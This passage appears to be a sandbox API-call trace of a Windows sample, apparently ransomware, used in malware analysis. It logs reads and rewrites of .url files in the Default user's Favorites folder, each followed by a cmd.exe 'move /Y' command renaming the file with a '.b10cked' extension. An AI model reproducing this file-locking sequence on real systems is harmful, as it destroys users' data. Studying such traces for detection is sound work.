lpOverlapped=0x0) returned 1 [0213.422] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.422] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.426] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Home.url", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Home.url", lpUsedDefaultChar=0x0) returned 21 [0213.426] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.426] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.426] CloseHandle (hObject=0x120) returned 1 [0213.427] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Home.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL") returned 0x2f [0213.427] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.428] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~2.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Home.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x998, dwThreadId=0xdec)) returned 1 [0213.438] CloseHandle (hObject=0x1b4) returned 1 [0213.438] CloseHandle (hObject=0x120) returned 1 [0213.439] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.439] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.439] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.439] ReleaseMutex (hMutex=0xf8) returned 1 [0213.439] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.439] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.439] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27022870712) returned 1 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.440] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.441] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.441] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.442] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.442] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.442] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.442] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0213.442] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.443] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0213.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.446] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft At Work.url", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft At Work.url", lpUsedDefaultChar=0x0) returned 21 [0213.446] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0213.446] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0213.447] CloseHandle (hObject=0x120) returned 1 [0213.447] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft At Work.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL") returned 0x2f [0213.448] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MICROS~1\\") returned 0x23 [0213.449] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x990, dwThreadId=0x958)) returned 1 [0213.453] CloseHandle (hObject=0x1b4) returned 1 [0213.453] CloseHandle (hObject=0x120) returned 1 [0213.453] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.453] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", cchLength=0x2e | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\") returned 0x2e [0213.453] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount1=46, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MICROSOFT WEBSITES\\", cchCount2=46) returned 2 [0213.453] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.453] ReleaseMutex (hMutex=0xf8) returned 1 [0213.453] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.453] ReleaseMutex (hMutex=0xf8) returned 1 [0213.453] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.454] ReleaseMutex (hMutex=0xf8) returned 1 [0213.454] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0213.454] ReleaseMutex (hMutex=0xf8) returned 1 [0213.454] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27024332478) returned 1 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.454] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.455] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x86 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0213.456] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.456] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x42, lpOverlapped=0x0) returned 1 [0213.457] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0213.457] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x42, lpOverlapped=0x0) returned 1 [0213.457] SetFilePointer (in: hFile=0x120, lDistanceToMove=-66, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0213.458] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x42, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x42, 